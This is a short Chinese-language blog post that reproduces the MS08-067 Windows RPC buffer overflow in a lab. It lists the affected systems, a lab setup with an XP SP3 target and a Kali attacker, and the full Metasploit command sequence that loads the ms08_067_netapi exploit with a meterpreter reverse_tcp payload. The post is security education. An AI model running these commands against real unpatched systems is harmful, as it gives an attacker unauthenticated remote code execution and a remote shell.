ms08-067(RPC请求缓冲区溢出)漏洞复现

发布于 2019-11-24  1226 次阅读


0x01 简介

ms08-067全称为“RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,攻击者可能未经身份验证即可利用此漏洞运行任意代码。

0x02 影响系统

  • Windows 2000;
  • Windows XP;
  • Windows Server 2003;
  • Windows Vista;
  • Windows Server 2008;
  • Windows 7 Beta

0x03 实现环境

  • 靶机 : windows xp sp3
    • ip:192.168.199.111
  • 攻击机:kali
    • ip:192.168.199.145

0x04 使用命令

msfconsole 
search ms08-067
use exploit/windows/smb/ms08_067_netapi
show targets
set targets 34
show payload
set payload windows/meterpreter/reverse_tcp
set rhost 192.168.199.111
set lhost 192.168.199.145
run

0x05 视频演示


我不懂世界到底在热闹些什么